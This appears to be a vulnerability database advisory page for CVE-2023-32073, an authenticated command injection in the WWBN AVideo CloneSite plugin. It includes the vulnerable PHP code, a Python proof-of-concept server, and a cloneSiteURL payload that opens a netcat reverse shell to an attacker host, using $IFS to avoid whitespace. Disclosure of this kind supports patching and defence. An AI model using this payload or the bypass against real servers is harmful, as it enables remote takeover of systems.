CVE-2023-32073

HIGH8.8EPSS 18.5%

WWBN AVideo command injection vulnerability

Published: 5/12/2023Modified: 2/16/2024

Description

# WWBN AVideo Authenticated RCE A command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for [CVE-2023-30854](https://cve.report/CVE-2023-30854) which affects WWBN Avideo up to version 12.3 ## Vulnerable Code /plugin/CloneSite/cloneClient.json.php ```php $json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile)); $json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles)); $json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles)); // get dump file $cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}"; $log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file"); exec($cmd . " 2>&1", $output, $return_val); ``` The `$objClone->cloneSiteURL` is not properly sanitized. ## Exploit Proof-of-Concept avidexploit.py ```python from http.server import BaseHTTPRequestHandler, HTTPServer import time hostName = "localhost" serverPort = 8080 class MyServer(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8")) if __name__ == "__main__": webServer = HTTPServer((hostName, serverPort), MyServer) print("Server started http://%s:%s" % (hostName, serverPort)) try: webServer.serve_forever() except KeyboardInterrupt: pass webServer.server_close() print("Server stopped.") ``` Run in command line ```bash $ python3 avidexploit.py & $ ngrok tcp 8080 # optional if not running in VPS ``` - Then get your public facing IP and Port. Enter a cloneSiteURL like the following then hit clone to achieve command injection ```bash http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;# ``` **It is important to not use white spaces for the exploit to work. Replace whitespace with `$IFS` when adding arguments to your RCE** ![poc](https://i.ibb.co/bdpQYcK/2023-05-07-17-04-43-online-video-cutter-com.gif) ## Credits - JM Sanchez - [https://www.linkedin.com/in/juanmarcosanchez/](https://www.linkedin.com/in/juanmarcosanchez/)

Affected packages (1)

Packagist/wwbn/avideofrom 0, <= 12.4

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	HIGH8.8	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Affected packages (1)

CVSS scores

References (4)